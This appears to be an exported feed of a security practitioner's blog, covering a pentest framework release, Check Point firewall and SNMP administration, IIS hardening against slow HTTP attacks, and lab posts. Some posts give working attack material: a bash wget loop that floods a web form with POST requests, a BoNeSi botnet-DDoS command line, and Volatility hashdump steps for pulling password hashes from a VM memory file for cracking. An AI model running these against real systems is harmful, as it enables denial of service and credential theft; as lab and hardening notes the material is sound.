tag:blogger.com,1999:blog-46951880255103902102024-03-14T00:25:51.422+03:00Information Security NotesThe Simplest and Best Way to Manage Checkpoint Secure Platform
http://www.smartsplat.com
Cagdas Ulucan OSCP CCSE+ CCMSE+VSXhttp://www.blogger.com/profile/08631933224334223426noreply@blogger.comBlogger71125tag:blogger.com,1999:blog-4695188025510390210.post-66195237694650618022014-03-11T22:57:00.002+02:002022-11-03T17:09:33.089+03:00Penetration Testing Framework --- Smart Pentester ---<br />
<br />
I'm pleased to announce the first public release of Smart Pentester which aims to be a framework for Penetration testers. <a href="http://smartpentester.com/"><strong><span style="color: black;"></span></strong></a> <br />
<br />
SmartPentester can be downloaded at thr Google Drive link below<br />
<br /><a href="https://drive.google.com/file/d/1FVi8tUPTyAhF3w710OR_vReu3RAfLgXV/view">https://drive.google.com/file/d/1FVi8tUPTyAhF3w710OR_vReu3RAfLgXV/view</a><div><br />
<br />
Note : There is a false positive virus warning on file download. New portable file will be uploaded soon.<br />
<br />
Smart Pentester Framework will provide you a User Interface for Penetration testing, Malware Analysis, Forensic Analysis, Cyber Intelligence, Advanced packet generation techniques and more...<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://3.bp.blogspot.com/-2ZOB5tHeqYQ/Ux92-f2iyRI/AAAAAAAAAVo/sKEThBo0K-E/s1600/Smart_Pentester_Beta.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="212" src="https://3.bp.blogspot.com/-2ZOB5tHeqYQ/Ux92-f2iyRI/AAAAAAAAAVo/sKEThBo0K-E/s1600/Smart_Pentester_Beta.png" width="400" /></a></div>
<br />
<br />
<span style="font-size: x-small;"></span></div>Cagdas Ulucan OSCP CCSE+ CCMSE+VSXhttp://www.blogger.com/profile/08631933224334223426noreply@blogger.comtag:blogger.com,1999:blog-4695188025510390210.post-68552478527943640842013-02-17T14:48:00.000+02:002013-02-17T14:50:50.808+02:00Examining a Suspended Virtual Machine<div class="MsoNormal" style="margin: 0cm 0cm 10pt;">
<span style="font-family: Verdana, sans-serif;">I would like to show the danger of suspended virtual machines, with the tool called volatility there are several options you may extract from a vmem file can be found from the link below<o:p></o:p></span></div>
<div class="MsoNormal" style="margin: 0cm 0cm 10pt;">
<a href="http://code.google.com/p/volatility/wiki/CommandReference"><span style="font-family: Verdana, sans-serif;">http://code.google.com/p/volatility/wiki/CommandReference</span></a><o:p></o:p></div>
<div class="MsoNormal" style="margin: 0cm 0cm 10pt;">
<span style="font-family: Verdana, sans-serif;">With in the example , we will find the local password for the related OS User<o:p></o:p></span></div>
<div class="MsoNormal" style="margin: 0cm 0cm 10pt;">
<span style="font-family: Verdana, sans-serif; line-height: 115%;">To use hashdump, pass the virtual address of the SYSTEM hive as -y and the virtual address of the SAM hive as -s, like this</span><o:p></o:p></div>
<div class="MsoNormal" style="margin: 0cm 0cm 10pt;">
<span style="font-family: Verdana, sans-serif;"><span style="mso-fareast-language: TR; mso-no-proof: yes;"><v:shapetype coordsize="21600,21600" filled="f" id="_x0000_t75" o:preferrelative="t" o:spt="75" path="m@4@5l@4@11@9@11@9@5xe" stroked="f"><v:stroke joinstyle="miter"></v:stroke><v:formulas><v:f eqn="if lineDrawn pixelLineWidth 0"></v:f><v:f eqn="sum @0 1 0"></v:f><v:f eqn="sum 0 0 @1"></v:f><v:f eqn="prod @2 1 2"></v:f><v:f eqn="prod @3 21600 pixelWidth"></v:f><v:f eqn="prod @3 21600 pixelHeight"></v:f><v:f eqn="sum @0 0 1"></v:f><v:f eqn="prod @6 1 2"></v:f><v:f eqn="prod @7 21600 pixelWidth"></v:f><v:f eqn="sum @8 21600 0"></v:f><v:f eqn="prod @7 21600 pixelHeight"></v:f><v:f eqn="sum @10 21600 0"></v:f></v:formulas><v:path gradientshapeok="t" o:connecttype="rect" o:extrusionok="f"></v:path><o:lock aspectratio="t" v:ext="edit"></o:lock></v:shapetype></span><o:p></o:p></span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://3.bp.blogspot.com/-AymUEMhSg_w/USDRKEJuZDI/AAAAAAAAAS8/5qn-P-3M0XI/s1600/volatility_cagdas.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><span style="font-family: Verdana, sans-serif;"><img border="0" height="220" src="http://3.bp.blogspot.com/-AymUEMhSg_w/USDRKEJuZDI/AAAAAAAAAS8/5qn-P-3M0XI/s400/volatility_cagdas.jpg" uea="true" width="400" /></span></a></div>
<div class="MsoNormal" style="margin: 0cm 0cm 10pt;">
<span style="font-family: Verdana, sans-serif;"><br /></span></div>
<div class="MsoNormal" style="margin: 0cm 0cm 10pt;">
<span style="font-family: Verdana, sans-serif; line-height: 115%;">Hashes can now be cracked using John the Ripper, rainbow tables, etc </span><o:p></o:p></div>
<div class="MsoNormal" style="margin: 0cm 0cm 10pt;">
<span style="font-family: Verdana, sans-serif;">In this example I have used <span style="line-height: 115%;">cracker.offensive-security.com password appeared with in few minutes</span></span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://1.bp.blogspot.com/-4LdJDzMbQx4/USDRS7tB2GI/AAAAAAAAATE/GHBB6mz-ydc/s1600/cracker_cagdas.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><span style="font-family: Verdana, sans-serif;"><img border="0" height="42" src="http://1.bp.blogspot.com/-4LdJDzMbQx4/USDRS7tB2GI/AAAAAAAAATE/GHBB6mz-ydc/s400/cracker_cagdas.jpg" uea="true" width="400" /></span></a></div>
<div class="separator" style="clear: both; text-align: center;">
<span style="font-family: Verdana, sans-serif;"><br /></span></div>
Cagdas Ulucan OSCP CCSE+ CCMSE+VSXhttp://www.blogger.com/profile/08631933224334223426noreply@blogger.comtag:blogger.com,1999:blog-4695188025510390210.post-79537897433467767182013-02-17T14:42:00.001+02:002013-02-17T14:52:15.341+02:00Illegal post SYN packetSymptoms : fw ctl zdebug shows drops like: _tcstate_update Reason: Illegal post SYN packet;<br />
<br />
Any packet from the Client other than SYN or RST, is considered as a security issue, fw thinks that the Client tries to send packets before the Server has responded to the initial request SYN<br />
In order to allow such unexpected packets, enable the related kernel parameter on the Security Gateway.<br />
<br />
Check the mechanism with,<br />
# fw ctl get int fw_allow_out_of_state_post_syn<br />
<br />
# fw ctl set int fw_allow_out_of_state_post_syn 1 activate on the fly<br />
# fw ctl set int fw_allow_out_of_state_post_syn 0 deactivate on the fly<br />
<br />
If it helps to resolve the issue it's time to make it persistent after a reboot<br />
Create the $FWDIR/boot/modules/fwkern.conf file, if it does't exist.This file is not present by default<br />
<br />
[Expert@testfw]# cd $FWDIR/boot/modules/<br />
[Expert@testfw]# pwd<br />
/opt/CPsuite-R7X/fw1/boot/modules<br />
[Expert@testfw]# vi fwkern.conf<br />
<br />
fw_allow_out_of_state_post_syn=0x1<br />
<br />
define it with its hex value Cagdas Ulucan OSCP CCSE+ CCMSE+VSXhttp://www.blogger.com/profile/08631933224334223426noreply@blogger.comtag:blogger.com,1999:blog-4695188025510390210.post-83222975388038915102013-02-06T14:12:00.002+02:002013-02-06T14:29:27.943+02:00IIS Tunning Recommendations against Slow http AttacksIf an HTTP request is not complete, or if the transfer rate is very low, the server keeps its resources busy waiting for the rest of the data. If the server keeps too many resources busy, this creates a denial of service.<br />
A single attacker can take down victim web server with minimal bandwidth.<br />
<br />
Limit request attributes is through the RequestLimits element, specifically the maxAllowedContentLength, maxQueryString, and maxUrl attributes<br />
<a href="http://www.iis.net/configreference/system.webserver/security/requestfiltering/requestlimits">http://www.iis.net/configreference/system.webserver/security/requestfiltering/requestlimits</a><br />
<br />
Suggestion<br />
maximum URL length: 2KB by specifying 2048.<br />
maximum query string length : 1KB by specifying 1024.<br />
Deny access to unlisted HTTP verbs by clearing the Allow unlisted verbs check box.<br />
<br />
Set headerLimits to configure the type and size of header your web server will accept. <br />
<a href="http://www.iis.net/configreference/system.webserver/security/requestfiltering/requestlimits/headerlimits">http://www.iis.net/configreference/system.webserver/security/requestfiltering/requestlimits/headerlimits</a><br />
<br />
Suggestion<br />
Content-type: 100 bytes<br />
<br />
Tune the connectionTimeout, headerWaitTimeout, and minBytesPerSecond attributes of the limits and WebLimits elements to minimize the impact of slow <br />
HTTP attacks.<br />
<br />
Suggestion<br />
connectionTimeout: 30sec<br />
headerWaitTimeout: 30sec<br />
minBytesPerSecond: 250<br />
<br />
Limits<br />
<a href="http://www.iis.net/configreference/system.applicationhost/sites/sitedefaults/limits">http://www.iis.net/configreference/system.applicationhost/sites/sitedefaults/limits</a><br />
<br />
Web Limits<br />
<a href="http://www.iis.net/configreference/system.applicationhost/weblimits">http://www.iis.net/configreference/system.applicationhost/weblimits</a>Cagdas Ulucan OSCP CCSE+ CCMSE+VSXhttp://www.blogger.com/profile/08631933224334223426noreply@blogger.comtag:blogger.com,1999:blog-4695188025510390210.post-55676163988079635112013-01-12T23:39:00.000+02:002013-01-14T14:39:31.438+02:00Lets do Some HTTP Post FloodThis tool allows you to edit and replicate HTTP parameters after the request finally leaves your browser.<br />
Its for educational purposes only.The aim of this tool is to show the wget usage.<br />
Can be downloaded at <br />
<b><a href="https://docs.google.com/file/d/0B0EDab8sQhCCYTRvTlhFUTZwOTA/edit">https://docs.google.com/file/d/0B0EDab8sQhCCYTRvTlhFUTZwOTA/edit</a></b><br />
<br />
File Named: HTTP Flooder v1.0 Uses WGET.zip<br />
It Uses wget.exe located at c:\ drive, Creates an HTML file of the HTTP response at the directory where it runs.<br />
<br />
Example Usage: Before running it,sniff the traffic with a local proxy like webscarab and copy/paste the final request data to flood.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://4.bp.blogspot.com/-fGeoRonEjUg/UPHYUMY7E9I/AAAAAAAAASU/ytjYEjfFOiI/s1600/http_flooder_v1.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://4.bp.blogspot.com/-fGeoRonEjUg/UPHYUMY7E9I/AAAAAAAAASU/ytjYEjfFOiI/s1600/http_flooder_v1.JPG" /></a></div>
<br />
<br />
<br />
For Linux Users,<br />
Example of a simple bash script, will do a 100 post request<br />
<br />
#!/bin/bash<br />
for i in {1..100};<br />
do<br />
wget --user-agent=Firefox/10 --referer=https://www.vulnwebtest.com --post-data="__VIEWSTATE=%2FwEPDwULLTExMjU2MzY2MjcPZBYCAgMPZBYSAgMPDxYCHgRUZXh0BQxVc2VyIE5hbWUgOiBkZAIFDw8WBB8ABQR0ZXN0HgdFbmFibGVkaGRkAgcAPDxYCHgdWaXNpYmxlaGRkAgkPDxYCHwJoZGQCDQ8PFgIfAmdkZAIPDw8WB9B8ABQR0ZXN0HwJnZGQCEQ8PAFgIfAmdkZAITDw8WAh8CZ2RkAhUPDxYCHwJnZGRk8Nl1HK2Uc%2B9sUZwQEPNDjmgqRms%3D&__EVENTVALIDATION=%2FwEWBAK41KgrAuzRsusGAuzR9tkMArursYYIKiocz95qxVisTmMDLVdMhHxNkYk%3D&Email=test&Button=Send+Password" --no-check-certificate --no-dns-cache http://www.vulnwebtest.com/test.aspx<br />
doneCagdas Ulucan OSCP CCSE+ CCMSE+VSXhttp://www.blogger.com/profile/08631933224334223426noreply@blogger.comtag:blogger.com,1999:blog-4695188025510390210.post-39398013440605724912012-12-11T17:29:00.001+02:002012-12-25T17:48:56.992+02:00How to Simulate a HTTP GET BotNet DDoS AttackToday I would like to share a cool tool called Bonesi DDoS Botnet Simulator.<br />
<br />
web page : <a href="http://code.google.com/p/bonesi/">http://code.google.com/p/bonesi/</a><br />
<br />
BoNeSi is able to simulate a TCP based HTTP-GET flood on a victim.3way handshake is completed. Its a much more advanced testing technique than Syn Http Flood, hping can only send tcp packet flags.<br />
Since non spoofed IP connections require correct routing setup, this tool can only be used in closed testbed setups.<br />
<br />
It can establish several thousands of HTTP connections from different IP addresses defined at iplist.txt making this tool to simulate advanced bot networks. <br />
<br />
How does TCP Spoofing work? <br />
BoNeSi sniffs for TCP packets on the network interface and responds to all packets in order to establish TCP connections. For this feature, it is necessary, that all traffic from the target webserver is routed back to the host running BoNeSi <br />
HTTP-Flooding attacks can not be simulated in the internet, because answers from the webserver must be routed back to the host running BoNeSi. <br />
<br />
It can be used to test firewall systems, routing hardware, DDoS Mitigation Systems or webservers directly. <br />
<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://3.bp.blogspot.com/-Wdj7TQPBHVI/UMdRCAe3nzI/AAAAAAAAARs/7E3QUHCZdy8/s1600/Capture.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img bea="true" border="0" height="245" src="http://3.bp.blogspot.com/-Wdj7TQPBHVI/UMdRCAe3nzI/AAAAAAAAARs/7E3QUHCZdy8/s400/Capture.JPG" width="400" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://3.bp.blogspot.com/-EKBWWQJFtlY/UMdREvX2FCI/AAAAAAAAAR0/Jz0MNFcCsvw/s1600/Capture2.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img bea="true" border="0" height="297" src="http://3.bp.blogspot.com/-EKBWWQJFtlY/UMdREvX2FCI/AAAAAAAAAR0/Jz0MNFcCsvw/s400/Capture2.JPG" width="400" /></a></div>
my test usage was,<br />
# bonesi -i 50k-bots.txt -p tcp -r 0 -u <a href="http://cagdastestlab.com/">http://cagdastestlab.com</a> -b useragent.txt -d eth1 -v 213.153.205.182:80<br />
<br />
<br />
<br />
<span style="font-size: x-small;">Usage: bonesi [OPTION...] <dst_ip:port></span><br />
<span style="font-size: x-small;"> Options:</span><br />
<span style="font-size: x-small;"> -i, --ips=FILENAME filename with ip list</span><br />
<span style="font-size: x-small;"> -p, --protocol=PROTO udp (default), icmp or tcp</span><br />
<span style="font-size: x-small;"> -r, --send_rate=NUM packets per second, 0 = infinite (default)</span><br />
<span style="font-size: x-small;"> -s, --payload_size=SIZE size of the paylod, (default: 32)</span><br />
<span style="font-size: x-small;"> -o, --stats_file=FILENAME filename for the statistics, (default: 'stats')</span><br />
<span style="font-size: x-small;"> -c, --max_packets=NUM maximum number of packets (requests at tcp/http), 0 = infinite (default)</span><br />
<span style="font-size: x-small;"> --integer IPs are integers in host byte order instead of in dotted notation</span><br />
<span style="font-size: x-small;"> -t, --max_bots=NUM determine max_bots in the 24bit prefix randomly (1-256)</span><br />
<span style="font-size: x-small;"> -u, --url=URL the url (default: '/') (only for tcp/http)</span><br />
<span style="font-size: x-small;"> -l, --url_list=FILENAME filename with url list (only for tcp/http)</span><br />
<span style="font-size: x-small;"> -b, --useragent_list=FILENAME filename with useragent list (only for tcp/http)</span><br />
<span style="font-size: x-small;"> -d, --device=DEVICE network listening device (only for tcp/http)</span><br />
<span style="font-size: x-small;"> -m, --mtu=NUM set MTU, (default 1500)</span><br />
<span style="font-size: x-small;"> -f, --frag=NUM set fragmentation mode (0=IP, 1=TCP, default: 0)</span><br />
<span style="font-size: x-small;"> -v, --verbose print additional debug messages</span><br />
<span style="font-size: x-small;"> -h, --help print this message and exit</span><br />
<br />
<br />
<br />
Cagdas Ulucan OSCP CCSE+ CCMSE+VSXhttp://www.blogger.com/profile/08631933224334223426noreply@blogger.com1tag:blogger.com,1999:blog-4695188025510390210.post-18317036039381836902012-11-26T15:26:00.001+02:002012-12-06T12:01:24.693+02:00Smart Uploader (GUI for cp_uploader.exe)As you know CheckPoint released a new upload tool called Check Point Uploader utility ( sk84000 )<br />
This tool enables you to upload the files securely to Check Point using your user center credentials.<br />
<br />
I have developed a GUI for cp_uploader.exe<br />
Enjoy it!<br />
<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://2.bp.blogspot.com/-oxrEIsNBeHo/ULNt9b32z2I/AAAAAAAAARU/vuL0aYyw6Do/s1600/SmartUploader.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="213" src="http://2.bp.blogspot.com/-oxrEIsNBeHo/ULNt9b32z2I/AAAAAAAAARU/vuL0aYyw6Do/s400/SmartUploader.JPG" tea="true" width="400" /></a></div>
<br />
<br />
<br />
<a href="https://docs.google.com/open?id=0B0EDab8sQhCCUlN5YlctZ0c2dmM" target="_blank">Click to download Smart Uploader</a><br />
<br />
<br />Cagdas Ulucan OSCP CCSE+ CCMSE+VSXhttp://www.blogger.com/profile/08631933224334223426noreply@blogger.com1tag:blogger.com,1999:blog-4695188025510390210.post-71783427817283416902012-11-14T17:49:00.000+02:002012-11-14T17:49:19.582+02:00How to Enable SNMP on Checkpoint# snmp service disable<br /># snmp service enable<br />
# snmp user show<br />You should delete the community named public<br />
# snmp user del public<br />
# snmp user add noauthuser CommunityName<br />
<br /># snmp service stat<br />You should see <br />SNMP service enabled and listening on port 161.<br />
enable snmp extensions<br />
# cp_conf snmp get<br />Currently SNMP Extension is active<br />
# cp_conf snmp activate<br />
Check the ports, both 260 and 161 should be listening..<br />
<br />Lets do some SNMP Walk <br />
Total RAM on System<br /># snmpwalk -v1 -c CommunityName firewallipaddress .1.3.6.1.4.1.2021.4.5.0<br />
do a fw tab -t connections -s and count connections<br /># snmpwalk -v1 -c testcom 192.168.1.112 .1.3.6.1.4.1.2620.1.1.25.3.0<br />
<br />Snmp version should be 5.3.1.0-2<br />checkout with the command #rpm –qa | grep net-snmp<br />
Some Checkpoint SNMP OIDS<br />
CPU Usage .1.3.6.1.4.1.2620.1.6.7.2.4.0 <br />CPU System .1.3.6.1.4.1.2620.1.6.7.2.2.0 <br />CPU User .1.3.6.1.4.1.2620.1.6.7.2.1.0 <br />Number of Connections .1.3.6.1.4.1.2620.1.1.25.3.0 <br />Peak Number of Connections .1.3.6.1.4.1.2620.1.1.25.4.0 <br />Memory Total .1.3.6.1.4.1.2620.1.6.7.4.3.0 <br />Memory Used .1.3.6.1.4.1.2620.1.6.7.4.4.0 <br />Memory Free 1.3.6.1.4.1.2620.1.6.7.1.5.0 <br />Memory Buffered .1.3.6.1.4.1.2021.4.14.0 <br />Memory cached .1.3.6.1.4.1.2021.4.15.0 <br />Swap error .1.3.6.1.4.1.2021.4.100.0 <br />CPU FAN Speed 1.3.6.1.4.1.2620.1.6.7.8.2.1.3.1.0 <br />Chassis FAN Speed 1.3.6.1.4.1.2620.1.6.7.8.2.1.3.2.0 <br />Core Voltage 1.3.6.1.4.1.2620.1.6.7.8.3.1.3.1.0 <br />VCC+Voltage 1.3.6.1.4.1.2620.1.6.7.8.3.1.3.2.0 <br />1.8 Voltage 1.3.6.1.4.1.2620.1.6.7.8.3.1.3.3.0 <br />5V Power Supply In 1.3.6.1.4.1.2620.1.6.7.8.3.1.3.4.0 <br />5V Standby Voltage 1.3.6.1.4.1.2620.1.6.7.8.3.1.3.5.0 <br />Battery Voltage 1.3.6.1.4.1.2620.1.6.7.8.3.1.3.6.0 <br />CPU temperature 1.3.6.1.4.1.2620.1.6.7.8.1.1.3.1.0 <br />M/B Temperature 1.3.6.1.4.1.2620.1.6.7.8.1.1.3.2.0Cagdas Ulucan OSCP CCSE+ CCMSE+VSXhttp://www.blogger.com/profile/08631933224334223426noreply@blogger.comtag:blogger.com,1999:blog-4695188025510390210.post-28953532543293564702012-11-14T13:59:00.000+02:002012-11-14T14:03:43.535+02:00DDoS Seminar in Ankara<div class="separator" style="clear: both; text-align: left;">
Last friday Checkpoint and InfoNet have prepared a DDoS seminar in Ankara,</div>
I had created a lab similar to <a href="http://www.youtube.com/watch?v=5rhw7zsiarQ&feature=plcp" target="_blank">http://www.youtube.com/watch?v=5rhw7zsiarQ&feature=plcp</a> that I have posted earlier.<br />
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
The lab had 2 phases, with DDoS protector and without it which the attacker directly faces to firewall, We have investigated and compared both behaviours..<br />
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
After showing some attack vectors the main subject was to try to explain the reason of why we need a DDoS mitigation device other than getting this as a service from ISP and explained why its a network design problem and how to deal with it on every hop count</div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://3.bp.blogspot.com/-WVGbB_d7Tjc/UKN07dkDZxI/AAAAAAAAAQw/e7GuEGMXkZc/s1600/1.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" rea="true" src="http://3.bp.blogspot.com/-WVGbB_d7Tjc/UKN07dkDZxI/AAAAAAAAAQw/e7GuEGMXkZc/s1600/1.JPG" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://4.bp.blogspot.com/-DEe1X8lC8Fs/UKN09Q1wUyI/AAAAAAAAAQ4/Ut9hzNzROJI/s1600/5.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" rea="true" src="http://4.bp.blogspot.com/-DEe1X8lC8Fs/UKN09Q1wUyI/AAAAAAAAAQ4/Ut9hzNzROJI/s1600/5.JPG" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://4.bp.blogspot.com/-1N4xH0EyQzo/UKN0_bFufjI/AAAAAAAAARA/z7xlzgceoYw/s1600/6.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" rea="true" src="http://4.bp.blogspot.com/-1N4xH0EyQzo/UKN0_bFufjI/AAAAAAAAARA/z7xlzgceoYw/s1600/6.JPG" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
Cagdas Ulucan OSCP CCSE+ CCMSE+VSXhttp://www.blogger.com/profile/08631933224334223426noreply@blogger.comtag:blogger.com,1999:blog-4695188025510390210.post-19653678274624524702012-11-10T13:43:00.003+02:002013-02-16T13:37:06.882+02:00Recently Published Posts in Journals<div style="border-bottom: medium none; border-left: medium none; border-right: medium none; border-top: medium none;">
</div>
<div style="border-bottom: medium none; border-left: medium none; border-right: medium none; border-top: medium none;">
<div style="border-bottom: medium none; border-left: medium none; border-right: medium none; border-top: medium none;">
<strong>BTHaber</strong></div>
<div style="border-bottom: medium none; border-left: medium none; border-right: medium none; border-top: medium none;">
<strong>No:908 February 2013</strong><a href="http://2.bp.blogspot.com/-3SlM32s2b2g/UJ49FLGAnjI/AAAAAAAAAP0/k5LNkJr4cSc/s1600/btlogo.jpg" imageanchor="1" style="clear: left; cssfloat: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" rea="true" src="http://2.bp.blogspot.com/-3SlM32s2b2g/UJ49FLGAnjI/AAAAAAAAAP0/k5LNkJr4cSc/s1600/btlogo.jpg" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<a href="http://www.bthaber.com/merhaba-mobilite/">http://www.bthaber.com/merhaba-mobilite/</a><br />
<br />
<a href="http://www.bthaber.com/her-yerde-guvenlik/">http://www.bthaber.com/her-yerde-guvenlik/</a><br />
<br />
<div class="separator" style="clear: both; text-align: center;">
</div>
<a href="http://4.bp.blogspot.com/-OifN0LGOEGU/UR4NNaUhE_I/AAAAAAAAASo/fj37dZK0zSw/s1600/bthaber022013.JPG" imageanchor="1" style="clear: left; cssfloat: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="http://4.bp.blogspot.com/-OifN0LGOEGU/UR4NNaUhE_I/AAAAAAAAASo/fj37dZK0zSw/s1600/bthaber022013.JPG" uea="true" /></a><br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<strong>IT PRO </strong></div>
<div style="border-bottom: medium none; border-left: medium none; border-right: medium none; border-top: medium none;">
<strong>No:139 November 2012</strong></div>
<div class="separator" style="border-bottom: medium none; border-left: medium none; border-right: medium none; border-top: medium none; clear: both; text-align: center;">
</div>
<div style="border-bottom: medium none; border-left: medium none; border-right: medium none; border-top: medium none;">
<a href="http://4.bp.blogspot.com/-GWuG0CPw6Zk/UJ4_wblbsCI/AAAAAAAAAQU/QcYcDRMfDXg/s1600/itproimg.png" imageanchor="1" style="clear: left; cssfloat: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" rea="true" src="http://4.bp.blogspot.com/-GWuG0CPw6Zk/UJ4_wblbsCI/AAAAAAAAAQU/QcYcDRMfDXg/s1600/itproimg.png" /></a></div>
<br />
<br />
<br />
<br />
<a href="http://4.bp.blogspot.com/-mUV2u1P0MY8/UJ49hmjFirI/AAAAAAAAAQE/lwyFjDV_Pxs/s1600/itpro_cagdasulucan.jpg" imageanchor="1" style="clear: left; cssfloat: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" rea="true" src="http://4.bp.blogspot.com/-mUV2u1P0MY8/UJ49hmjFirI/AAAAAAAAAQE/lwyFjDV_Pxs/s1600/itpro_cagdasulucan.jpg" /></a><br />
<div style="border-bottom: medium none; border-left: medium none; border-right: medium none; border-top: medium none;">
<br /></div>
<div style="border-bottom: medium none; border-left: medium none; border-right: medium none; border-top: medium none;">
<br /></div>
<div style="border-bottom: medium none; border-left: medium none; border-right: medium none; border-top: medium none;">
<br /></div>
<div style="border-bottom: medium none; border-left: medium none; border-right: medium none; border-top: medium none;">
<br /></div>
<div style="border-bottom: medium none; border-left: medium none; border-right: medium none; border-top: medium none;">
<br /></div>
<div style="border-bottom: medium none; border-left: medium none; border-right: medium none; border-top: medium none;">
<br /></div>
<div style="border-bottom: medium none; border-left: medium none; border-right: medium none; border-top: medium none;">
<br /></div>
<div style="border-bottom: medium none; border-left: medium none; border-right: medium none; border-top: medium none;">
<br /></div>
<div style="border-bottom: medium none; border-left: medium none; border-right: medium none; border-top: medium none;">
<br /></div>
<div style="border-bottom: medium none; border-left: medium none; border-right: medium none; border-top: medium none;">
<br /></div>
<div style="border-bottom: medium none; border-left: medium none; border-right: medium none; border-top: medium none;">
<br /></div>
<div style="border-bottom: medium none; border-left: medium none; border-right: medium none; border-top: medium none;">
<br /></div>
<div style="border-bottom: medium none; border-left: medium none; border-right: medium none; border-top: medium none;">
<br /></div>
<div style="border-bottom: medium none; border-left: medium none; border-right: medium none; border-top: medium none;">
<br /></div>
<div style="border-bottom: medium none; border-left: medium none; border-right: medium none; border-top: medium none;">
<br /></div>
<div style="border-bottom: medium none; border-left: medium none; border-right: medium none; border-top: medium none;">
<br /></div>
<div style="border-bottom: medium none; border-left: medium none; border-right: medium none; border-top: medium none;">
<br /></div>
<div style="border-bottom: medium none; border-left: medium none; border-right: medium none; border-top: medium none;">
<br /></div>
<div style="border-bottom: medium none; border-left: medium none; border-right: medium none; border-top: medium none;">
<br /></div>
<div style="border-bottom: medium none; border-left: medium none; border-right: medium none; border-top: medium none;">
<br /></div>
<div style="border-bottom: medium none; border-left: medium none; border-right: medium none; border-top: medium none;">
<br /></div>
<div style="border-bottom: medium none; border-left: medium none; border-right: medium none; border-top: medium none;">
<br /></div>
<div style="border-bottom: medium none; border-left: medium none; border-right: medium none; border-top: medium none;">
<br /></div>
<div style="border-bottom: medium none; border-left: medium none; border-right: medium none; border-top: medium none;">
<br /></div>
<div style="border-bottom: medium none; border-left: medium none; border-right: medium none; border-top: medium none;">
<br /></div>
<div style="border-bottom: medium none; border-left: medium none; border-right: medium none; border-top: medium none;">
<br /></div>
<div style="border-bottom: medium none; border-left: medium none; border-right: medium none; border-top: medium none;">
<br /></div>
<div style="border-bottom: medium none; border-left: medium none; border-right: medium none; border-top: medium none;">
<br /></div>
<div style="border-bottom: medium none; border-left: medium none; border-right: medium none; border-top: medium none;">
<br /></div>
<div style="border-bottom: medium none; border-left: medium none; border-right: medium none; border-top: medium none;">
<br /></div>
<div style="border-bottom: medium none; border-left: medium none; border-right: medium none; border-top: medium none;">
<br /></div>
<div style="border-bottom: medium none; border-left: medium none; border-right: medium none; border-top: medium none;">
<br /></div>
<div style="border-bottom: medium none; border-left: medium none; border-right: medium none; border-top: medium none;">
<br /></div>
<div style="border-bottom: medium none; border-left: medium none; border-right: medium none; border-top: medium none;">
<br /></div>
<div style="border-bottom: medium none; border-left: medium none; border-right: medium none; border-top: medium none;">
<br /></div>
<div style="border-bottom: medium none; border-left: medium none; border-right: medium none; border-top: medium none;">
<br /></div>
<div style="border-bottom: medium none; border-left: medium none; border-right: medium none; border-top: medium none;">
<br /></div>
<div style="border-bottom: medium none; border-left: medium none; border-right: medium none; border-top: medium none;">
<br /></div>
<div style="border-bottom: medium none; border-left: medium none; border-right: medium none; border-top: medium none;">
<br /></div>
<div style="border-bottom: medium none; border-left: medium none; border-right: medium none; border-top: medium none;">
<br /></div>
<div style="border-bottom: medium none; border-left: medium none; border-right: medium none; border-top: medium none;">
<br /></div>
<div style="border-bottom: medium none; border-left: medium none; border-right: medium none; border-top: medium none;">
<br /></div>
<div style="border-bottom: medium none; border-left: medium none; border-right: medium none; border-top: medium none;">
<br /></div>
<div style="border-bottom: medium none; border-left: medium none; border-right: medium none; border-top: medium none;">
<br /></div>
<div style="border-bottom: medium none; border-left: medium none; border-right: medium none; border-top: medium none;">
<br /></div>
<div style="border-bottom: medium none; border-left: medium none; border-right: medium none; border-top: medium none;">
<br /></div>
<div style="border-bottom: medium none; border-left: medium none; border-right: medium none; border-top: medium none;">
<br /></div>
<div style="border-bottom: medium none; border-left: medium none; border-right: medium none; border-top: medium none;">
<br /></div>
<div style="border-bottom: medium none; border-left: medium none; border-right: medium none; border-top: medium none;">
<br /></div>
<div style="border-bottom: medium none; border-left: medium none; border-right: medium none; border-top: medium none;">
<br /></div>
<div style="border-bottom: medium none; border-left: medium none; border-right: medium none; border-top: medium none;">
<br /></div>
